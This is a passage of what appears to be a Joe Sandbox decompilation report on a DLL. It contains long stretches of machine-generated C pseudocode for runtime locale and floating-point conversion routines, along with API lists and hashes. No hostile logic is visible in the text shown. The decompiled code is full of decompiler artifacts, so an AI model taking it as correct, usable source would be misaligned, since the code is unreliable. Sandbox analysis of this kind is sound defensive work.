              									} else {
              										_push(0x5f);
              										_t68 = E6DAA21B7(_t98);
              										_t98 = _t87;
              										if(_t68 != 0) {
              											L31:
              											_t22 = _t119 + 0x120; // 0xd0
              											if(E6DA96812(_t22, 7, _t87, 0x40) == 0) {
              												goto L37;
              											} else {
              												goto L32;
              											}
              										} else {
              											_push(0x2e);
              											_t73 = E6DAA21B7(_t98);
              											_t98 = _t87;
              											if(_t73 == 0) {
              												L32:
              												_t119 = _t119 + 0x100;
              												if(_t125 != 0xfde9) {
              													E6DAA0752(_t98, _t125, _t119, 0x10, 0xa);
              													goto L36;
              												} else {
              													_push(5);
              													_t72 = E6DA9B800(_t98, _t119, 0x10, L"utf8");
              													_t132 = _t132 + 0x10;
              													if(_t72 != 0) {
              														goto L39;
              													} else {
              														goto L36;
              													}
              												}
              											} else {
              												goto L31;
              											}
              										}
              									}
              								}
              							}
              						}
              					}
              				}
              			}

              APIs
                • Part of subcall function 6DA92BDC: GetLastError.KERNEL32(?,00000008,6DA98ED9), ref: 6DA92BE0
                • Part of subcall function 6DA92BDC: SetLastError.KERNEL32(00000000,?,00000005,000000FF), ref: 6DA92C82
              • GetACP.KERNEL32(?,?,?,?,?,?,6DA9361F,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 6DA9C06F
              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6DA9361F,?,?,?,00000055,?,-00000050,?,?), ref: 6DA9C09A
              • _wcschr.LIBVCRUNTIME ref: 6DA9C12E
              • _wcschr.LIBVCRUNTIME ref: 6DA9C13C
              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6DA9C1FD
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
              • String ID: utf8
              • API String ID: 4147378913-905460609
              • Opcode ID: 460e3757473499b3acedd39295f94c3f7e9923c3568a295f982efffb07408232
              • Instruction ID: 4263c8687c5795e0899addb16826112fc55b9bb746515c28ac501e415c2ba56c
              • Opcode Fuzzy Hash: 460e3757473499b3acedd39295f94c3f7e9923c3568a295f982efffb07408232
              • Instruction Fuzzy Hash: 4E71057562CB06AAEB149B75CD81BB673F8EF09304F198129E615DF1C0EB74E9C087A4
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 70%
              			E6DA9CC86(signed int __edx, void* __edi, void* __eflags, signed char _a4, signed int _a8, intOrPtr _a12, signed int _a16, signed int _a20, signed int _a24, intOrPtr _a28) {
              				signed int _v8;
              				signed int _v464;
              				void _v468;
              				signed int _v472;
              				signed int _v932;
              				signed int _v936;
              				signed int _v1392;
              				signed int _v1396;
              				signed int _v1400;
              				char _v1860;
              				signed int _v1864;
              				signed int _v1868;
              				signed int _v1872;
              				signed int _v1876;
              				signed int _v1880;
              				char _v1881;
              				signed int _v1888;
              				signed int _v1892;
              				signed int _v1896;
              				signed int _v1900;
              				signed int _v1904;
              				signed int _v1908;
              				intOrPtr _v1912;
              				signed int* _v1916;
              				signed int _v1920;
              				signed int _v1924;
              				signed int _v1928;
              				signed int _v1932;
              				signed int _v1936;
              				char _v1944;
              				signed int _v1952;
              				signed int _v1956;
              				char _v2416;
              				signed int _v2420;
              				signed int _v2448;
              				void* __ebx;
              				void* __esi;
              				signed int _t802;
              				intOrPtr _t812;
              				signed int _t819;
              				signed int _t825;
              				void* _t829;
              				signed int _t830;
              				intOrPtr _t836;
              				void* _t837;
              				signed int _t843;
              				signed int _t848;
              				signed int _t849;
              				signed int _t850;
              				signed int _t853;
              				signed int _t855;
              				signed int _t857;
              				signed int _t858;
              				signed int _t863;
              				signed int _t864;
              				signed int _t869;
              				signed int _t871;
              				signed int _t872;
              				signed int _t879;
              				signed int _t880;
              				signed int _t888;
              				signed int _t891;
              				signed int _t896;
              				signed int* _t899;
              				signed int _t903;
              				signed int _t914;
              				signed int _t915;
              				signed int _t917;
              				signed int _t918;
              				char* _t919;
              				signed int _t922;
              				signed int _t928;
              				signed int _t930;
              				signed int _t934;
              				signed int _t942;
              				signed int _t945;
              				signed int _t948;
              				signed int _t951;
              				signed int _t960;
              				signed int _t961;
              				signed int _t964;
              				signed int _t977;
              				signed int _t978;
              				signed int _t980;
              				signed int _t981;
              				signed int* _t982;
              				signed int _t985;
              				signed int* _t988;
              				signed int _t991;
              				signed int _t993;
              				signed int _t998;
              				signed int _t1006;
              				signed int _t1009;
              				signed int _t1013;
              				signed int _t1016;
              				signed int _t1025;
              				intOrPtr _t1030;
              				signed int _t1031;
              				signed int _t1037;
              				void* _t1045;
              				signed int _t1046;
              				signed int _t1047;
              				signed int _t1048;
              				signed int* _t1051;
              				signed int _t1059;
              				signed int _t1063;
              				signed int _t1065;
              				signed int _t1070;
              				void* _t1076;
              				signed int _t1077;
              				signed int _t1078;
              				signed int _t1079;
              				signed int _t1082;
              				signed int _t1087;
              				signed int _t1088;
              				signed int _t1092;
              				signed int _t1094;
              				signed int _t1099;
              				signed int _t1101;
              				signed int _t1102;
              				void* _t1105;
              				signed char _t1106;
              				signed int _t1112;
              				signed int _t1113;
              				signed int _t1115;
              				signed int _t1122;
              				void* _t1127;
              				signed char _t1133;
              				intOrPtr* _t1136;
              				signed int _t1141;
              				signed int _t1142;
              				void* _t1144;
              				signed int _t1147;
              				signed int _t1149;
              				signed int _t1150;
              				signed int _t1151;
              				signed int _t1158;
              				signed int _t1162;
              				signed int _t1163;
              				signed int _t1164;
              				signed int _t1165;
              				signed int _t1167;
              				signed int* _t1169;
              				signed int _t1170;
              				signed int _t1174;
              				signed int _t1175;
              				signed int _t1176;
              				signed int _t1177;
              				signed int _t1179;
              				signed int _t1181;
              				signed int _t1182;
              				signed int _t1186;
              				signed int _t1187;
              				unsigned int _t1188;
              				unsigned int _t1192;
              				unsigned int _t1195;
              				signed int _t1196;
              				signed int _t1199;
              				signed int* _t1202;
              				signed int _t1205;
              				void* _t1207;
              				unsigned int _t1208;
              				signed int _t1209;
              				signed int _t1212;
              				signed int* _t1215;
              				signed int _t1218;
              				signed char _t1220;
              				signed int _t1227;
              				signed int _t1228;
              				signed int _t1229;
              				signed int _t1230;
              				signed int _t1233;
              				signed int _t1235;
              				signed int _t1237;
              				char _t1240;
              				signed int _t1242;
              				signed int _t1243;
              				signed int _t1244;
              				signed int _t1245;
              				signed int _t1246;
              				signed int _t1247;
              				signed int _t1248;
              				signed int _t1250;
              				signed int _t1251;
              				signed int _t1252;
              				signed int _t1253;
              				signed int _t1254;
              				void* _t1255;
              				signed int _t1256;
              				signed int _t1258;
              				signed int _t1263;
              				signed int _t1267;
              				void* _t1268;
              				intOrPtr _t1269;
              				void* _t1272;
              				unsigned int _t1275;
              				signed int _t1276;
              				void* _t1277;
              				signed int _t1279;
              				signed int _t1280;
              				signed int _t1281;
              				signed int _t1282;
              				signed int _t1285;
              				signed int _t1286;
              				signed int _t1287;
              				signed int _t1288;
              				signed int _t1289;
              				signed int _t1292;
              				signed int _t1293;
              				signed int _t1294;
              				signed int _t1295;
              				void* _t1296;
              				void* _t1299;
              				signed int _t1301;
              				signed int _t1305;
              				signed int* _t1307;
              				signed int _t1311;
              				signed int _t1312;
              				signed int _t1315;
              				signed int _t1317;
              				signed int _t1318;
              				signed int _t1320;
              				void* _t1323;
              				void* _t1324;
              				signed int _t1326;
              				signed int _t1327;
              				signed int _t1328;
              				signed int _t1330;
              				signed int _t1331;
              				signed int _t1332;
              				signed int _t1334;
              				signed int _t1344;
              				void* _t1346;
              				signed char* _t1347;
              				signed char* _t1348;
              				signed int _t1352;
              				signed char _t1360;
              
              				_t1268 = __edi;
              				_t1227 = __edx;
              				_t802 =  *0x6dab3014; // 0x6c4e8ceb
              				_v8 = _t802 ^ _t1344;
              				_v1932 = _a20;
              				_v1888 = _a24;
              				E6DAA0952(__eflags,  &_v1952);
              				_t1122 = 1;
              				if((_v1952 & 0x0000001f) != 0x1f) {
              					E6DAA09BA(__eflags,  &_v1952);
              					_v1944 = 1;
              				} else {
              					_v1944 = 0;
              				}
              				_t1315 = _a8;
              				_push(_t1268);
              				_t1269 = 0x20;
              				_t1352 = _t1315;
              				if(_t1352 > 0 || _t1352 >= 0 && _a4 >= 0) {
              					_t812 = _t1269;
              				} else {
              					_t812 = 0x2d;
              				}
              				_t1136 = _v1932;
              				 *_t1136 = _t812;
              				 *((intOrPtr*)(_t1136 + 8)) = _v1888;
              				E6DAA08F3( &_v1956, 0, 0);
              				_t1347 = _t1346 + 0xc;
              				if((_t1315 & 0x7ff00000) != 0) {
              					L12:
              					_t819 = E6DA947F7( &_a4);
              					__eflags = _t819;
              					if(_t819 == 0) {
              						L24:
              						_v1936 = _v1936 & 0x00000000;
              						_a8 = _t1315 & 0x7fffffff;
              						_t1360 = _a4;
              						asm("fst qword [ebp-0x774]");
              						_t1317 = _v1908;
              						_v1928 = _a12 + 1;
              						_t1141 = _t1317 >> 0x14;
              						_t825 = _t1141 & 0x000007ff;
              						__eflags = _t825;
              						if(_t825 != 0) {
              							_t825 = 0;
              							_t1228 = 0x100000;
              							_t41 =  &_v1868;
              							 *_t41 = _v1868 & 0;
              							__eflags =  *_t41;
              						} else {
              							_t1228 = 0;
              							_v1868 = _t1122;
              						}
              						_t1318 = _t1317 & 0x000fffff;
              						_v1924 = _v1912 + _t825;
              						asm("adc esi, edx");
              						_t1142 = _t1141 & 0x000007ff;
              						_v1872 = _v1868 + _t1142;
              						E6DAA0A10(_t1142, _t1360);
              						_push(_t1142);
              						 *_t1347 = _t1360;
              						_t829 = E6DAA0B20(_t1142);
              						_t1144 = _t1142;
              						_t830 = L6DAA1FF0(_t829, _t1122, _t1144, _t1228);
              						_v1904 = _t830;
              						_t1272 = 0x20;
              						__eflags = _t830 - 0x7fffffff;
              						if(_t830 == 0x7fffffff) {
              							L29:
              							__eflags = 0;
              							_v1904 = 0;
              						} else {
              							__eflags = _t830 - 0x80000000;
              							if(_t830 == 0x80000000) {
              								goto L29;
              							}
              						}
              						_t1229 = _v1872;
              						__eflags = _t1318;
              						_v468 = _v1924;
              						_v464 = _t1318;
              						_t1147 = (0 | _t1318 != 0x00000000) + 1;
              						_v1868 = _t1147;
              						_v472 = _t1147;
              						__eflags = _t1229 - 0x433;
              						if(_t1229 < 0x433) {
              							__eflags = _t1229 - 0x35;
              							if(_t1229 == 0x35) {
              								L100:
              								__eflags = _t1318;
              								_t211 =  &_v1908;
              								 *_t211 = _v1908 & 0x00000000;
              								__eflags =  *_t211;
              								_t836 =  *((intOrPtr*)(_t1344 + 4 + (0 | _t1318 != 0x00000000) * 4 - 0x1d4));
              								asm("bsr eax, eax");
              								if( *_t211 == 0) {
              									_t837 = 0;
              									__eflags = 0;
              								} else {
              									_t837 = _t836 + 1;
              								}
              								__eflags = _t1272 - _t837 - _t1122;
              								asm("sbb esi, esi");
              								_t1320 =  ~_t1318 + _t1147;
              								__eflags = _t1320 - 0x73;
              								if(_t1320 <= 0x73) {
              									_t1230 = _t1320 - 1;
              									__eflags = _t1230 - 0xffffffff;
              									if(_t1230 != 0xffffffff) {
              										_t1296 = _t1230 - 1;
              										while(1) {
              											__eflags = _t1230 - _t1147;
              											if(_t1230 >= _t1147) {
              												_t1025 = 0;
              												__eflags = 0;
              											} else {
              												_t1025 =  *(_t1344 + _t1230 * 4 - 0x1d0);
              											}
              											__eflags = _t1296 - _t1147;
              											if(_t1296 >= _t1147) {
              												_t1188 = 0;
              												__eflags = 0;
              											} else {
              												_t1188 =  *(_t1344 + _t1230 * 4 - 0x1d4);
              											}
              											 *(_t1344 + _t1230 * 4 - 0x1d0) = _t1188 >> 0x0000001f | _t1025 + _t1025;
              											_t1230 = _t1230 - 1;
              											_t1296 = _t1296 - 1;
              											__eflags = _t1230 - 0xffffffff;
              											if(_t1230 == 0xffffffff) {
              												goto L115;
              											}
              											_t1147 = _v472;
              										}
              									}
              									L115:
              									_v472 = _t1320;
              								} else {
              									_v1400 = _v1400 & 0x00000000;
              									_v472 = _v472 & 0x00000000;
              									E6DA90928( &_v468, 0x1cc,  &_v1396, 0);
              									_t1347 =  &(_t1347[0x10]);
              								}
              								_t1275 = 0x434 >> 5;
              								E6DA8B0A0(0x434 >> 5,  &_v1396, 0, 0x434);
              								__eflags = 1;
              								 *(_t1344 + 0xbad63d) = 1 << (0x00000434 - _v1872 & 0x0000001f);
              							} else {
              								_v1396 = _v1396 & 0x00000000;
              								_v1392 = 0x100000;
              								_v1400 = 2;
              								__eflags = _t1318;
              								if(_t1318 != 0) {
              									_t1255 = 0;
              									__eflags = 0;
              									while(1) {
              										_t1030 =  *((intOrPtr*)(_t1344 + _t1255 - 0x570));
              										__eflags = _t1030 -  *((intOrPtr*)(_t1344 + _t1255 - 0x1d0));
              										if(_t1030 !=  *((intOrPtr*)(_t1344 + _t1255 - 0x1d0))) {
              											goto L100;
              										}
              										_t1255 = _t1255 + 4;
              										__eflags = _t1255 - 8;
              										if(_t1255 != 8) {
              											continue;
              										} else {
              											__eflags = 0;
              											asm("bsr eax, esi");
              											_v1908 = 0;
              											if(0 == 0) {
              												_t1031 = 0;
              											} else {
              												_t1031 = _t1030 + 1;
              											}
              											__eflags = _t1272 - _t1031 - 2;
              											asm("sbb esi, esi");
              											_t1334 =  ~_t1318 + _t1147;
              											__eflags = _t1334 - 0x73;
              											if(_t1334 <= 0x73) {
              												_t1256 = _t1334 - 1;
              												__eflags = _t1256 - 0xffffffff;
              												if(_t1256 != 0xffffffff) {
              													_t1299 = _t1256 - 1;
              													while(1) {
              														__eflags = _t1256 - _t1147;
              														if(_t1256 >= _t1147) {
              															_t1037 = 0;
              														} else {
              															_t1037 =  *(_t1344 + _t1256 * 4 - 0x1d0);
              														}
              														__eflags = _t1299 - _t1147;
              														if(_t1299 >= _t1147) {
              															_t1192 = 0;
              														} else {
              															_t1192 =  *(_t1344 + _t1256 * 4 - 0x1d4);
              														}
              														 *(_t1344 + _t1256 * 4 - 0x1d0) = _t1192 >> 0x0000001e | _t1037 << 0x00000002;
              														_t1256 = _t1256 - 1;
              														_t1299 = _t1299 - 1;
              														__eflags = _t1256 - 0xffffffff;
              														if(_t1256 == 0xffffffff) {
              															goto L98;
              														}
              														_t1147 = _v472;
              													}
              												}
              												L98:
              												_v472 = _t1334;
              											} else {
              												_v1400 = 0;
              												_v472 = 0;
              												E6DA90928( &_v468, 0x1cc,  &_v1396, 0);
              												_t1347 =  &(_t1347[0x10]);
              											}
              											_t1275 = 0x435 >> 5;
              											E6DA8B0A0(0x435 >> 5,  &_v1396, 0, 0x435);
              											 *(_t1344 + 0xbad63d) = 1 << (0x00000435 - _v1872 & 0x0000001f);
              										}
              										goto L117;
              									}
              								}
              								goto L100;
              							}
              							L117:
              							_t843 = _t1275 + 1;
              							_t1323 = 0x1cc;
              							_v1400 = _t843;
              							_v936 = _t843;
              							E6DA90928( &_v932, 0x1cc,  &_v1396, _t843 << 2);
              							_t1348 =  &(_t1347[0x1c]);
              							_t1122 = 1;
              							__eflags = 1;
              						} else {
              							_v1396 = _v1396 & 0x00000000;
              							_v1392 = 0x100000;
              							_v1400 = 2;
              							__eflags = _t1318;
              							if(_t1318 == 0) {
              								L57:
              								_t1195 = _t1229 - 0x432;
              								_t1196 = _t1195 & 0x0000001f;
              								_v1880 = _t1195 >> 5;
              								_v1896 = _t1196;
              								_v1924 = _t1272 - _t1196;
              								_t1045 = E6DAA1ED0(_t1122, _t1272 - _t1196, 0);
              								_t1258 = _v1868;
              								_t1046 = _t1045 - 1;
              								_t130 =  &_v1908;
              								 *_t130 = _v1908 & 0x00000000;
              								__eflags =  *_t130;
              								_v1876 = _t1046;
              								_t1047 =  !_t1046;
              								_v1920 = _t1047;
              								asm("bsr eax, ecx");
              								if( *_t130 == 0) {
              									_t138 =  &_v1868;
              									 *_t138 = _v1868 & 0x00000000;
              									__eflags =  *_t138;
              								} else {
              									_v1868 = _t1047 + 1;
              								}
              								_t1199 = _v1880;
              								_t1323 = 0x1cc;
              								_t1048 = _t1199 + _t1258;
              								__eflags = _t1048 - 0x73;
              								if(_t1048 <= 0x73) {
              									__eflags = _t1272 - _v1868 - _v1896;
              									asm("sbb eax, eax");
              									_t1051 =  ~_t1048 + _t1199 + _t1258;
              									_v1916 = _t1051;
              									__eflags = _t1051 - 0x73;
              									if(_t1051 > 0x73) {
              										goto L61;
              									} else {
              										_t1301 = _t1199 - 1;
              										_t1059 = _t1051 - 1;
              										_v1900 = _t1301;
              										_v1872 = _t1059;
              										__eflags = _t1059 - _t1301;
              										if(_t1059 != _t1301) {
              											_t1305 = _t1059 - _t1199;
              											__eflags = _t1305;
              											_t1202 =  &(( &_v472)[_t1305]);
              											_v1892 = _t1202;
              											while(1) {
              												__eflags = _t1305 - _t1258;
              												if(_t1305 >= _t1258) {
              													_t1063 = 0;
              													__eflags = 0;
              												} else {
              													_t1063 = _t1202[1];
              												}
              												_v1868 = _t1063;
              												_t158 = _t1305 - 1; // -4
              												__eflags = _t158 - _t1258;
              												if(_t158 >= _t1258) {
              													_t1065 = 0;
              													__eflags = 0;
              												} else {
              													_t1065 =  *_t1202;
              												}
              												_t1205 = _v1872;
              												 *(_t1344 + _t1205 * 4 - 0x1d0) = (_t1065 & _v1920) >> _v1924 | (_v1868 & _v1876) << _v1896;
              												_t1070 = _t1205 - 1;
              												_t1202 = _v1892 - 4;
              												_v1872 = _t1070;
              												_t1305 = _t1305 - 1;
              												_v1892 = _t1202;
              												__eflags = _t1070 - _v1900;
              												if(_t1070 == _v1900) {
              													break;
              												}
              												_t1258 = _v472;
              											}
              											_t1199 = _v1880;
              										}
              										__eflags = _t1199;
              										if(_t1199 != 0) {
              											__eflags = 0;
              											memset( &_v468, 0, _t1199 << 2);
              											_t1347 =  &(_t1347[0xc]);
              										}
              										_v472 = _v1916;
              									}
              								} else {
              									L61:
              									_v1400 = 0;
              									_v472 = 0;
              									E6DA90928( &_v468, _t1323,  &_v1396, 0);
              									_t1347 =  &(_t1347[0x10]);
              								}
              								_v1396 = 2;
              								_push(4);
              							} else {
              								_t1207 = 0;
              								__eflags = 0;
              								while(1) {
              									__eflags =  *((intOrPtr*)(_t1344 + _t1207 - 0x570)) -  *((intOrPtr*)(_t1344 + _t1207 - 0x1d0));
              									if( *((intOrPtr*)(_t1344 + _t1207 - 0x570)) !=  *((intOrPtr*)(_t1344 + _t1207 - 0x1d0))) {
              										goto L57;
              									}
              									_t1207 = _t1207 + 4;
              									__eflags = _t1207 - 8;
              									if(_t1207 != 8) {
              										continue;
              									} else {
              										_t1208 = _t1229 - 0x431;
              										_t1209 = _t1208 & 0x0000001f;
              										_v1880 = _t1208 >> 5;
              										_v1896 = _t1209;
              										_v1876 = _t1272 - _t1209;
              										_t1076 = E6DAA1ED0(_t1122, _t1272 - _t1209, 0);
              										_t1263 = _v1868;
              										_t1077 = _t1076 - 1;
              										_t70 =  &_v1908;
              										 *_t70 = _v1908 & 0x00000000;
              										__eflags =  *_t70;
              										_v1900 = _t1077;
              										_t1078 =  !_t1077;
              										_v1924 = _t1078;
              										asm("bsr eax, ecx");
              										if( *_t70 == 0) {
              											_t78 =  &_v1868;
              											 *_t78 = _v1868 & 0x00000000;
              											__eflags =  *_t78;
              										} else {
              											_v1868 = _t1078 + 1;
              										}
              										_t1212 = _v1880;
              										_t1323 = 0x1cc;
              										_t1079 = _t1212 + _t1263;
              										__eflags = _t1079 - 0x73;
              										if(_t1079 <= 0x73) {
              											__eflags = _t1272 - _v1868 - _v1896;
              											asm("sbb eax, eax");
              											_t1082 =  ~_t1079 + _t1212 + _t1263;
              											_v1920 = _t1082;
              											__eflags = _t1082 - 0x73;
              											if(_t1082 > 0x73) {
              												goto L39;
              											} else {
              												_t1307 = _t1212 - 1;
              												_t1088 = _t1082 - 1;
              												_v1916 = _t1307;
              												_v1872 = _t1088;
              												__eflags = _t1088 - _t1307;
              												if(_t1088 != _t1307) {
              													_t1311 = _t1088 - _t1212;
              													__eflags = _t1311;
              													_t1215 =  &(( &_v472)[_t1311]);
              													_v1892 = _t1215;
              													while(1) {
              														__eflags = _t1311 - _t1263;
              														if(_t1311 >= _t1263) {
              															_t1092 = 0;
              															__eflags = 0;
              														} else {
              															_t1092 = _t1215[1];
              														}
              														_v1868 = _t1092;
              														_t98 = _t1311 - 1; // -4
              														__eflags = _t98 - _t1263;
              														if(_t98 >= _t1263) {
              															_t1094 = 0;
              															__eflags = 0;
              														} else {
              															_t1094 =  *_t1215;
              														}
              														_t1218 = _v1872;
              														 *(_t1344 + _t1218 * 4 - 0x1d0) = (_t1094 & _v1924) >> _v1876 | (_v1868 & _v1900) << _v1896;
              														_t1099 = _t1218 - 1;
              														_t1215 = _v1892 - 4;
              														_v1872 = _t1099;
              														_t1311 = _t1311 - 1;
              														_v1892 = _t1215;
              														__eflags = _t1099 - _v1916;
              														if(_t1099 == _v1916) {
              															break;
              														}
              														_t1263 = _v472;
              													}
              													_t1212 = _v1880;
              												}
              												__eflags = _t1212;
              												if(_t1212 != 0) {
              													__eflags = 0;
              													memset( &_v468, 0, _t1212 << 2);
              													_t1347 =  &(_t1347[0xc]);
              												}
              												_v472 = _v1920;
              											}
              										} else {
              											L39:
              											_v1400 = 0;
              											_v472 = 0;
              											E6DA90928( &_v468, _t1323,  &_v1396, 0);
              											_t1347 =  &(_t1347[0x10]);
              										}
              										_t1087 = 4;
              										_v1396 = _t1087;
              										_push(_t1087);
              									}
              									goto L56;
              								}
              								goto L57;
              							}
              							L56:
              							_v1392 = _v1392 & 0x00000000;
              							_push( &_v1396);
              							_v936 = _t1122;
              							_push(_t1323);
              							_push( &_v932);
              							_v1400 = _t1122;
              							E6DA90928();
              							_t1348 =  &(_t1347[0x10]);
              						}
              						_t848 = _v1904;
              						_t1149 = 0xa;
              						_v1924 = _t1149;
              						__eflags = _t848;
              						if(_t848 < 0) {
              							_t849 =  ~_t848;
              							_t850 = _t849 / _t1149;
              							_v1916 = _t850;
              							_t1150 = _t849 % _t1149;
              							_v1908 = _t1150;
              							__eflags = _t850;
              							if(_t850 == 0) {
              								L250:
              								__eflags = _t1150;
              								if(_t1150 != 0) {
              									_t896 =  *(0x6daa6f14 + _t1150 * 4);
              									_v1908 = _t896;
              									__eflags = _t896;
              									if(_t896 == 0) {
              										L262:
              										__eflags = 0;
              										_push(0);
              										_v472 = 0;
              										_v2420 = 0;
              										goto L263;
              									} else {
              										__eflags = _t896 - _t1122;
              										if(_t896 != _t1122) {
              											_t1165 = _v472;
              											__eflags = _t1165;
              											if(_t1165 != 0) {
              												_v1876 = _v1876 & 0x00000000;
              												_t1282 = 0;
              												__eflags = 0;
              												do {
              													_t1244 = _t896 *  *(_t1344 + _t1282 * 4 - 0x1d0) >> 0x20;
              													 *(_t1344 + _t1282 * 4 - 0x1d0) = _t896 *  *(_t1344 + _t1282 * 4 - 0x1d0) + _v1876;
              													_t896 = _v1908;
              													asm("adc edx, 0x0");
              													_t1282 = _t1282 + 1;
              													_v1876 = _t1244;
              													__eflags = _t1282 - _t1165;
              												} while (_t1282 != _t1165);
              												__eflags = _t1244;
              												if(_t1244 != 0) {
              													_t903 = _v472;
              													__eflags = _t903 - 0x73;
              													if(_t903 >= 0x73) {
              														goto L262;
              													} else {
              														 *(_t1344 + _t903 * 4 - 0x1d0) = _t1244;
              														_v472 = _v472 + 1;
              													}
              												}
              											}
              										}
              									}
              								}
              							} else {
              								do {
              									__eflags = _t850 - 0x26;
              									if(_t850 > 0x26) {
              										_t850 = 0x26;
              									}
              									_t1166 =  *(0x6daa6e7e + _t850 * 4) & 0x000000ff;
              									_v1880 = _t850;
              									_v1400 = ( *(0x6daa6e7f + _t850 * 4) & 0x000000ff) + ( *(0x6daa6e7e + _t850 * 4) & 0x000000ff);
              									E6DA8B0A0(_t1166 << 2,  &_v1396, 0, _t1166 << 2);
              									_t914 = E6DA8AB10( &(( &_v1396)[_t1166]), 0x6daa6578 + ( *(0x6daa6e7c + _v1880 * 4) & 0x0000ffff) * 4, ( *(0x6daa6e7f + _t850 * 4) & 0x000000ff) << 2);
              									_t1245 = _v1400;
              									_t1348 =  &(_t1348[0x18]);
              									_v1872 = _t1245;
              									__eflags = _t1245 - _t1122;
              									if(_t1245 > _t1122) {
              										__eflags = _v472 - _t1122;
              										if(_v472 > _t1122) {
              											__eflags = _t1245 - _v472;
              											_t1326 =  &_v1396;
              											_t547 = _t1245 - _v472 > 0;
              											__eflags = _t547;
              											_t915 = _t914 & 0xffffff00 | _t547;
              											if(_t547 >= 0) {
              												_t1326 =  &_v468;
              											}
              											_v1892 = _t1326;
              											__eflags = _t915;
              											if(_t915 == 0) {
              												_v1896 = _t1245;
              												_t1245 = _v472;
              												_v1872 = _t1245;
              												_v1876 =  &_v1396;
              											} else {
              												_v1896 = _v472;
              												_v1876 =  &_v468;
              											}
              											_t917 = 0;
              											_t1285 = 0;
              											_v1864 = 0;
              											__eflags = _t1245;
              											if(_t1245 == 0) {
              												L244:
              												_v472 = _t917;
              												_t1323 = 0x1cc;
              												_t918 = _t917 << 2;
              												__eflags = _t918;
              												_push(_t918);
              												_t919 =  &_v1860;
              												goto L245;
              											} else {
              												do {
              													__eflags =  *(_t1326 + _t1285 * 4);
              													if( *(_t1326 + _t1285 * 4) != 0) {
              														_t1167 = 0;
              														_t1327 = _t1285;
              														_v1868 = 0;
              														_v1900 = 0;
              														__eflags = _v1896;
              														if(_v1896 != 0) {
              															_t1246 = 0;
              															while(1) {
              																__eflags = _t1327 - 0x73;
              																if(_t1327 == 0x73) {
              																	break;
              																}
              																__eflags = _t1327 - _t917;
              																if(_t1327 == _t917) {
              																	 *(_t1344 + _t1327 * 4 - 0x740) =  *(_t1344 + _t1327 * 4 - 0x740) & 0x00000000;
              																	_t579 = _t1285 + 1; // 0x1
              																	_t934 = _t579 + _t1167;
              																	__eflags = _t934;
              																	_v1864 = _t934;
              																}
              																_t930 =  *(_v1876 + _t1167 * 4);
              																_t1170 = _v1892;
              																_t1246 = _t930 *  *(_t1170 + _t1285 * 4) >> 0x20;
              																asm("adc edx, 0x0");
              																 *(_t1344 + _t1327 * 4 - 0x740) =  *(_t1344 + _t1327 * 4 - 0x740) + _t930 *  *(_t1170 + _t1285 * 4) + _v1868;
              																_t917 = _v1864;
              																asm("adc edx, 0x0");
              																_t1167 = _v1900 + 1;
              																_t1327 = _t1327 + 1;
              																_v1868 = _t1246;
              																_v1900 = _t1167;
              																__eflags = _t1167 - _v1896;
              																if(_t1167 != _v1896) {
              																	continue;
              																}
              																break;
              															}
              															__eflags = _t1246;
              															if(_t1246 != 0) {
              																_t1169 =  &_v1860 + _t1327 * 4;
              																_v1868 = _t1169;
              																while(1) {
              																	__eflags = _t1327 - 0x73;
              																	if(_t1327 == 0x73) {
              																		goto L240;
              																	}
              																	__eflags = _t1327 - _t917;
              																	if(_t1327 == _t917) {
              																		 *_t1169 =  *_t1169 & 0x00000000;
              																		__eflags =  *_t1169;
              																		_t609 = _t1327 + 1; // 0x1
              																		_v1864 = _t609;
              																	}
              																	_v1868 = _v1868 + 4;
              																	_t928 = _t1246;
              																	_t1327 = _t1327 + 1;
              																	_t1246 = 0;
              																	 *_t1169 =  *_t1169 + _t928;
              																	__eflags =  *_t1169;
              																	_t917 = _v1864;
              																	asm("adc edx, edx");
              																	if( *_t1169 != 0) {
              																		_t1169 = _v1868;
              																		continue;
              																	}
              																	goto L240;
              																}
              															}
              															L240:
              															_t1245 = _v1872;
              														}
              														__eflags = _t1327 - 0x73;
              														if(_t1327 == 0x73) {
              															_t1323 = 0x1cc;
              															goto L260;
              														} else {
              															_t1326 = _v1892;
              															goto L243;
              														}
              													} else {
              														__eflags = _t1285 - _t917;
              														if(_t1285 == _t917) {
              															 *(_t1344 + _t1285 * 4 - 0x740) =  *(_t1344 + _t1285 * 4 - 0x740) & 0x00000000;
              															_t568 = _t1285 + 1; // 0x1
              															_t917 = _t568;
              															_v1864 = _t917;
              														}
              														goto L243;
              													}
              													goto L247;
              													L243:
              													_t1285 = _t1285 + 1;
              													__eflags = _t1285 - _t1245;
              												} while (_t1285 != _t1245);
              												goto L244;
              											}
              										} else {
              											_t1286 = _v468;
              											_t1323 = 0x1cc;
              											_v1936 = _t1286;
              											_v472 = _t1245;
              											E6DA90928( &_v468, 0x1cc,  &_v1396, _t1245 << 2);
              											_t1348 =  &(_t1348[0x10]);
              											__eflags = _t1286;
              											if(_t1286 != 0) {
              												__eflags = _t1286 - _t1122;
              												if(_t1286 == _t1122) {
              													goto L246;
              												} else {
              													__eflags = _v472;
              													if(_v472 == 0) {
              														goto L246;
              													} else {
              														_t1174 = 0;
              														_v1920 = _v472;
              														_t1287 = 0;
              														__eflags = 0;
              														do {
              															_t942 = _v1936;
              															_t1247 = _t942 *  *(_t1344 + _t1287 * 4 - 0x1d0) >> 0x20;
              															 *(_t1344 + _t1287 * 4 - 0x1d0) = _t942 *  *(_t1344 + _t1287 * 4 - 0x1d0) + _t1174;
